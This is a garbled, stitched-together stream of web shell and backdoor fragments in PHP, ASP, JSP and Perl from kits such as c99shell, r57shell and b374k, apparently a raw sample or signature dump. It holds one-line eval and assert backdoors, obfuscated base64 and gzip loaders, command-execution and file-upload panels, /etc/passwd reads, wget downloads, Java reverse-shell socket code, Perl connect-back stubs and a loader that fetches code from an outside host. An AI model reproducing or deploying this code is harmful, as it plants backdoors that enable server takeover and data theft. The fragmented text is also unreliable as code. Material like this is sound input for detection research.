href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush 